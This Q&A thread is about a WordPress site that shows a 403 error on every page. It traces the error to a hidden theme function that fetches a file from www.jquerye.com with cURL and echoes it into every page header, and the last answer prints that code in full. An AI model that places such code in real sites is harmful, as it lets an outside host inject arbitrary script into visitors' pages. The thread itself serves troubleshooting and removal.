# 403 Forbidden error nginx

Tags: errors

I am getting this error (403 Forbidden error nginx) since couple of days all of the sudden. I have not modified anything on the site yet this error came from nowhere. I can see it on the top of all the pages. However the page gets displayed.

I am using Wordpress latest version, hosted on Powweb. I have asked their support team about this but they have no idea about it and asked me to deactivate all the plugins and check then. But after renaming plugins directory and cache directory also I can see this error on my site.

I don't understand what can be the issue that came all of the sudden? 
Please help me!

**UPDATE**:

Issue was resolved by commenting the code that was requesting the jquery file from www.jquerye.com site. But as that site is expired the jquery link too which was giving 403 Forbidden error.

I found that piece of code in themes/themename/framework/functions/init.php file with cURL requests. I have commented the last line which was adding to wp_head `add_action('wp_head', 'insert_jquery_slider');` and issue got resolved.

Comment: Things don't just stop working. Something happened. You need to work out what. Server change or update? Server crash? Software install or update-- theme, plugin, WordPress itself, PHP, something? Maybe a hack. Check your logs. Ask your host. Post [debugging information](http://codex.wordpress.org/Debugging_in_WordPress). The page does not actually 404, by the way. Something tries to load remote content (best guess) and _that_ 404s. Look at line ~67 of the generated source. There is a second `<html>` block.

Comment: @s_ha_dum yes i guessed that. but don't know where to look exactly to find out if any remote content is requested.

Comment: You must have done something since the last time looked? The output is very different.

Comment: That error came all of the sudden before 2 days. After that I am trying to solve it by modifying things without any luck. Yes I am still trying to fix it by changing files.

Comment: I caution you against haphazardly altering files in the hopes that something will work. You are more likely to make a mess. Post the code for your `header.php` and for the template that displays that page.

Comment: fixed it! the theme's framework init.php was sending curl request to get jquery file by calling add_action('wp_head', 'insert_jquery_slider');.

Comment: Go ahead and post your solution as a proper answer, so it can be "accepted" and the question resolved.

Comment: Thanks yaar...It works..!!!!! I just removed this content from init.php And I get it done..!

Answer (score 1, accepted):

Issue was resolved by commenting the code that was requesting the jquery file from www.jquerye.com site. But as that site is expired the jquery link too which was giving 403 Forbidden error.

I found that piece of code in themes/themename/framework/functions/init.php file with cURL requests. I have commented the last line which was adding to wp_head `add_action('wp_head', 'insert_jquery_slider');` and issue got resolved.

Answer (score 0):

Look for "functions" folder inside the installed theme directory. You may have a file called "class.php". You will see the following lines of codes.

```
<?php
if (!function_exists('insert_jquery_slider')){
    function insert_jquery_slider(){
        if (function_exists('curl_init')){
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_slider');
}
?>
```

Just Remove or comment this piece if code and you are done. :)